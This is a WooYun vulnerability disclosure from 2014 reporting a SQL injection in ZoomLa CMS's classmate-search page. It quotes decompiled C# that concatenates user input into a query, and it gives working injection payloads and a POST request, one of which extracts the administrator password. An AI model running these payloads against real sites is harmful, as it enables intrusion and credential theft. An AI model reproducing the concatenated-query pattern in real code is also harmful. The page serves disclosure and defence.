当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-070701

漏洞标题:逐浪cms sql注入漏洞

相关厂商:逐浪CMS

漏洞作者: Vigoss_Z

提交时间:2014-08-04 10:27

修复时间:2014-11-02 10:28

公开时间:2014-11-02 10:28

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-08-04: 细节已通知厂商并且等待厂商处理中
2014-08-04: 厂商已经确认,细节仅向厂商公开
2014-08-07: 细节向第三方安全合作伙伴开放
2014-09-28: 细节向核心白帽子及相关领域专家公开
2014-10-08: 细节向普通白帽子公开
2014-10-18: 细节向实习白帽子公开
2014-11-02: 细节向公众公开

简要描述:

http://www.zoomla.cn/down/2242.shtml
20140725更新.

详细说明:

前台注册(新版集成了N多功能)并登陆,会员中心处,http://demo.zoomla.cn/User/UserZone/School/SchoolFellow.aspx,查找同学处存在注入.

/User/UserZone/School/SchoolFellow.aspx
<%@ page language="C#" autoeventwireup="true" inherits="User_UserZone_School_SchoolFellow, App_Web_tgw2vs0x" enableEventValidation="false" viewStateEncryptionMode="Never" %>


反编译App_Web_tgw2vs0x.dll

App_Web_tgw2vs0x.User_UserZone_School_SchoolFellow
protected void Button1_Click(object sender, EventArgs e)
{
int num2;
DataTable table = this.st.Select_ByValue(" * ", " UserID in (select UserID from ZL_UserBase where TrueName like '%" + this.txtName.Text + "%') ", "");


search型注入.
z%' and @@version>0 and '%'='
z%' and (select top 1 AdminPassword from ZL_Manager)>0 and '%'='(管理员密码)
http://demo.zoomla.cn/User/UserZone/School/SchoolFellow.aspx
POST:
__EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=%2FwEPDwUKMTE0Nzc4NjkwNw9kFgICAw9kFgZmDw8WAh4EVGV4dAUJ6YCQ5rWqQ01TZGQCBQ9kFgICAQ88KwARAgEQFgAWABYADBQrAABkAg4PEGRkFgBkGAEFCUdyaWRWaWV3MQ9nZAfHrsmckVbLrrqqyYKBUUsyOWBm1AJUg2fMuuagtd6u&txtName=2013*(注入点)&Button1=%E6%9F%A5++%E6%89%BE

漏洞证明:

080201.jpg

080202.jpg

修复方案:

版权声明:转载请注明来源 Vigoss_Z@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2014-08-04 11:01

厂商回复:

感谢反馈。

最新状态:

暂无


漏洞评价:

评论